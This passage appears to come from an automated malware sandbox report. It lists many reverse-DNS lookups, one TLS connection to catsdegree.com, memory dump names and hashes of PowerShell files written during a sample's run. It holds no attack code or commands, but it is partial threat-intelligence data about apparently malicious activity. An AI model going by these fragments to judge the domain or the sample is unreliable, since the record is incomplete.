| US | 8.8.8.8:53 | 162.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.1.127.10.in-addr.arpa | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
Files
memory/2812-115-0x0000000000400000-0x000000000083B000-memory.dmp
memory/2812-117-0x0000000000030000-0x0000000000040000-memory.dmp
memory/2812-118-0x0000000000400000-0x000000000083B000-memory.dmp
memory/3732-123-0x0000026698470000-0x0000026698492000-memory.dmp
memory/3732-127-0x0000026698460000-0x0000026698462000-memory.dmp
memory/3732-128-0x0000026698463000-0x0000026698465000-memory.dmp
memory/3732-129-0x0000026698750000-0x00000266987C6000-memory.dmp
memory/3732-141-0x0000026698466000-0x0000026698468000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ea6243fdb2bfcca2211884b0a21a0afc |
| SHA1 | 2eee5232ca6acc33c3e7de03900e890f4adf0f2f |
| SHA256 | 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8 |
| SHA512 | 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5dc1c5e5f49d8a67a608b1f715ace841 |
| SHA1 | 812f23c3fce094196e514f140702f69ba13aab1f |
| SHA256 | d4df86e848e8eece19d9ec956704e488fe47de1df1a9d74dc2eba39ffdb39214 |
| SHA512 | ec232e6585f4c420076b634f8683dc0de1eaa29847efc398697f47313b1523d0f311d5dd35bb27e79e10ac807ccb5bdff220a66c35aaae82f3e4b13e517a5273 |